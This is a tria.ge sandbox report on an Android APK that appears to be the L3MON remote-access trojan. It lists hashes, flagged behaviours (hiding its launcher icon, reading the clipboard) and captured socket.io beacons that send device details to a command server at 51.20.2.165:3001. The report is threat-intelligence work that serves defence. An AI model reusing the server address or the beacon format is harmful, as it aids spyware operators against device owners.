Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

057689e28c...48.apk

android-9-x86

8

057689e28c...48.apk

android-10-x64

8

057689e28c...48.apk

android-11-x64

8

Analysis

  • max time kernel
    7s
  • max time network
    156s
  • platform
    android_x64
  • resource
    android-x64-20240624-en
  • resource tags

    androidarch:x64arch:x86image:android-x64-20240624-enlocale:en-usos:android-10-x64system
  • submitted
    07/12/2024, 02:06 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    057689e28c35811575811beaa1fa07bdc0130188f4590d286a564a0236060048.apk

  • Size

    267KB

  • MD5

    5d75e747ee6c22e97bb8b6583c613c89

  • SHA1

    e6dd14937e631b86fa9cf52e46c5b875a772a5ee

  • SHA256

    057689e28c35811575811beaa1fa07bdc0130188f4590d286a564a0236060048

  • SHA512

    00c5dff37a9a550d6149caa5e11cf89fee4970e16e8363d133f25f1b1f99443ffc54e36e8485dd93ef48481328efb35963112896f5d98400bd02b35e77573d66

  • SSDEEP

    6144:VAqOHJbQC/0BbaRWSoTlA87mhYrIZFjllLGvNv90ku:VAfJc4NUA8TI3llLo9A

Score
8/10
collectioncredential_accessevasionimpactstealthtrojan

Malware Config

Signatures

Processes

  • com.etechd.l3mon
    1⤵
    • Removes its main activity from the application launcher
    • Obtains sensitive information copied to the device clipboard
    PID:4959

Network

  • flag-se
    GET
    http://51.20.2.165:3001/socket.io/?model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&release=10&manf=Google
    Remote address:
    51.20.2.165:3001
    Request
    GET /socket.io/?model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&release=10&manf=Google HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: 51.20.2.165:3001
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 103
    Access-Control-Allow-Origin: *
    Set-Cookie: io=nvZt1PWuLWyzgPxbAAMX; Path=/; HttpOnly
    Date: Sat, 07 Dec 2024 02:06:42 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
  • flag-se
    GET
    http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX
    Remote address:
    51.20.2.165:3001
    Request
    GET /socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: 51.20.2.165:3001
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 16
    Access-Control-Allow-Origin: *
    Set-Cookie: io=nvZt1PWuLWyzgPxbAAMX; Path=/; HttpOnly
    Date: Sat, 07 Dec 2024 02:06:42 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
  • flag-se
    GET
    http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX
    Remote address:
    51.20.2.165:3001
    Request
    GET /socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: 51.20.2.165:3001
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 3
    Access-Control-Allow-Origin: *
    Set-Cookie: io=nvZt1PWuLWyzgPxbAAMX; Path=/; HttpOnly
    Date: Sat, 07 Dec 2024 02:06:43 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
  • flag-se
    GET
    http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=websocket&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX
    Remote address:
    51.20.2.165:3001
    Request
    GET /socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=websocket&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX HTTP/1.1
    Upgrade: websocket
    Connection: Upgrade
    Sec-WebSocket-Key: JSVmu+pHHnngbH93ugf6YA==
    Sec-WebSocket-Version: 13
    Host: 51.20.2.165:3001
    Accept-Encoding: gzip
    User-Agent: okhttp/3.5.0
    Response
    HTTP/1.1 101 Switching Protocols
    Upgrade: websocket
    Connection: Upgrade
    Sec-WebSocket-Accept: gMZ8VTOZEQGh3AzuRQyMQuqUxKg=
  • flag-us
    DNS
    ssl.google-analytics.com
    Remote address:
    1.1.1.1:53
    Request
    ssl.google-analytics.com
    IN A
    Response
    ssl.google-analytics.com
    IN A
    172.217.169.40
  • flag-us
    DNS
    android.apis.google.com
    Remote address:
    1.1.1.1:53
    Request
    android.apis.google.com
    IN A
    Response
    android.apis.google.com
    IN CNAME
    clients.l.google.com
    clients.l.google.com
    IN A
    142.250.178.14
  • 51.20.2.165:3001
    http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX
    http
    1.3kB
     1.2kB
     9
    7

    HTTP Request

    GET http://51.20.2.165:3001/socket.io/?model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&release=10&manf=Google

    HTTP Response

    200

    HTTP Request

    GET http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX

    HTTP Response

    200

    HTTP Request

    GET http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX

    HTTP Response

    200
  • 51.20.2.165:3001
    http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=websocket&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX
    http
    1.3kB
     732 B
     17
    11

    HTTP Request

    GET http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=websocket&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX

    HTTP Response

    101
  • 172.217.169.40:443
    ssl.google-analytics.com
    tls
    1.3kB
     6.3kB
     8
    9
  • 142.250.179.238:443
    tls, https
    857 B
     40 B
     1
    1
  • 142.250.178.14:443
    android.apis.google.com
    tls
    4.7kB
     8.8kB
     15
    23
  • 142.250.179.228:443
    tls, https
    429 B
     40 B
     2
    1
  • 142.250.179.228:443
    www.google.com
    tls
    8.5kB
     9.7kB
     28
    36
  • 224.0.0.251:5353
    3.7kB
     11
  • 1.1.1.1:53
    ssl.google-analytics.com
    dns
    70 B
     86 B
     1
    1

    DNS Request

    ssl.google-analytics.com

    DNS Response

    172.217.169.40

  • 1.1.1.1:53
    android.apis.google.com
    dns
    69 B
     109 B
     1
    1

    DNS Request

    android.apis.google.com

    DNS Response

    142.250.178.14

MITRE ATT&CK Mobile v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.